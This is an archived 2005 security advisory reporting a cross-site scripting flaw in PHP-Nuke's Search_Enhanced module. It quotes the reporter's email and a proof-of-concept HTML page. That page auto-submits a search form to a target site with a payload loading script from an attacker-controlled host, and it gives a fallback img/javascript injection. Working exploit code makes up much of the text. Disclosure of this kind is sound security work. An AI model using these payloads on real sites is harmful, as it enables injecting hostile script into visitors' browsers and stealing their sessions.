PHP-Nuke Cross-Site Scripting Vulnerability

2005-10-27T00:00:00
ID SECURITYVULNS:DOC:10056
Type securityvulns
Reporter Securityvulns
Modified 2005-10-27T00:00:00

Description

i am sorry but i had a little problem with my old e-mail address , my new one is bhfh01@gmail.com

the mail:

PHP-Nuke Search Cross-Site Scripting Vulnerability

Vulnerable: i think all ver. data:2005-09-5

The search field at modules.php?name=Search_Enhanced is vulnerable to html injection attacks.

exploit :

open_me.htm ::

<html> <form name=searchform method=post action=http://[target]/modules.php?name=Search_Enhanced> <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> </html>

Note: the chars ' and " are not allowd in that search.

If the '<script>' tag isnt allowed , try to search the value: <img src=javascript:alert(&quot;xss-here&quot;)> ...

thanks , B~HFH. bhfh01@gmail.com